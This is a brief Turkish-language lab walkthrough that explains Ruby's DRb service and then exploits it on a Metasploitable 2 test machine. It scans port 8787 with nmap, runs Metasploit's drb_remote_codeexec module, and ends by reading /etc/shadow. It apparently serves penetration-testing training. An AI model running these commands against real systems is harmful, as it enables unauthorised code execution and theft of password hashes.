DRb (Distributed Ruby) ağ üzerinden veya aynı sistemdeki ruby uygulamalarının birbiri ile iletişim kurmasına yarayan bir kütüphanedir. Böylece farklı bir Ruby prosesindeki bir nesne RMI / RPC (Remote Method Invocation / Remote Procedure Call) ile çağırılabilir.
IP adresi 192.168.162.131 olan Metasploitable 2, Nmap ile taratıldığında TCP 8787. portta Ruby DRb RMI servisinin çalıştığı ve bu servisin 1.8 sürümünün kullanıldığı görülmektedir.
nmap 192.168.162.131 -p 8787 -sV
Bu servise ait istismar kodu bulunur.
search druby
use exploit/linux/misc/drb_remote_codeexec
show options
Modül çalıştırılır.
set URI druby://192.168.162.131:8787
run
hostname
id
head -5 /etc/shadow